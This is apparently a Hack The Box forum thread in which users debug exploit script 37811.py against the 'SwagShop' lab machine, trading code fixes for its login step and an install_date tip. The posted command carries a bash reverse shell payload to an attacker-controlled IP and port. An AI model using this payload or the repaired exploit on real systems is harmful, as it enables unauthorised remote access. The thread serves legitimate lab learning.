SwagShop - errors in script 37811.py

Hi guys,

I’m pretty new on HTB and trying to hack my first machine “SwagShop”.

I am using the following command to get the reverse shell: python 37811.py http://10.10.10.140/index.php/admin/ 'bash -c "bash -i >& /dev/tcp/10.10.13.xxx/9001 0>&1"'

In the config section of the script I’ve set the right user, password and also the correct install date. I also tried Burp Suite to find out what's wrong, but no clue.

Attached my output:
root@kali:~# python 37811.py http://10.10.10.140/index.php/admin/ 'bash -c "bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1"'

Traceback (most recent call last):
  File "37811.py", line 55, in <module>
    br['login[username]'] = username
  File "/usr/lib/python2.7/dist-packages/mechanize/_mechanize.py", line 796, in __setitem__
    self.form[name] = val
  File "/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py", line 1963, in __setitem__
    control = self.find_control(name)
  File "/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py", line 2355, in find_control
    return self._find_control(name, type, kind, id, label, predicate, nr)
  File "/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py", line 2446, in _find_control
    description)
mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]'

Thanks for any advice.

BR
d3vided

This error results because for whatever reason, Mechanize is seeing multiple username/password fields. The index parameter must be used to select the correct one. Comment out the following in the script:

#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
#br.form.fixup()
#br['login[username]'] = username
#br['login[password]'] = password

And replace it with this:

userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwone = br.find_control(name="login[password]", nr=0)
pwone.value = password

This should fix the issue and allow Mechanize to log in. Note that more modification to the script will be required per the Ippsec video and official write-up.
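Why the index is needed, as an added example that is not part of the original post or of the 37811.py script: mechanize raises AmbiguityError when a name matches more than one control in the selected form, and nr picks the n-th match in document order. The sketch below uses only the Python 3 standard library (not mechanize) on constructed HTML to list the duplicated names and the nr each match would have; SAMPLE_HTML, ControlLister and ambiguous_controls are names made up here.

```python
from collections import defaultdict
from html.parser import HTMLParser

# Constructed sample (not captured from any real page): a login form in which
# the username field appears twice, the situation behind AmbiguityError.
SAMPLE_HTML = """
<form id="loginForm" method="post" action="/index.php/admin/">
  <input type="text" name="login[username]" value="">
  <input type="password" name="login[password]" value="">
  <input type="text" name="login[username]" value="">
  <input type="submit" value="Login">
</form>
"""

class ControlLister(HTMLParser):
    """Collect (type, name) for every named control, grouped per form."""
    CONTROL_TAGS = {"input", "select", "textarea", "button"}

    def __init__(self):
        super().__init__()
        self.forms = []        # one list of controls per <form>
        self.in_form = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.forms.append([])
            self.in_form = True
        elif tag in self.CONTROL_TAGS and self.in_form and attrs.get("name"):
            self.forms[-1].append((attrs.get("type", tag), attrs["name"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False

def ambiguous_controls(html, form_nr=0):
    """Return {name: [(nr, type), ...]} for names used more than once."""
    parser = ControlLister()
    parser.feed(html)
    by_name = defaultdict(list)
    for ctype, name in parser.forms[form_nr]:
        # nr is the 0-based position among controls sharing this name
        by_name[name].append((len(by_name[name]), ctype))
    return {n: hits for n, hits in by_name.items() if len(hits) > 1}

if __name__ == "__main__":
    for name, hits in ambiguous_controls(SAMPLE_HTML).items():
        print(name, "matches", len(hits), "controls:", hits)
```

Any name reported here cannot be set with br['name'] = value and has to be selected with find_control(name=..., nr=N) as in the post above.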

Hey Ruri. Works great, thx. :)

I tried this as well but I can’t get it working. I execute the scripts with the changes made and then I hit enter and nothing happens. No error message but also no shell.

@II0 said:

I tried this as well but I can’t get it working. I execute the scripts with the changes made and then I hit enter and nothing happens. No error message but also no shell.

I refreshed the value of install_date when I modified the exploit script. It is stored in a file that you can find by directory browsing through your web connection.
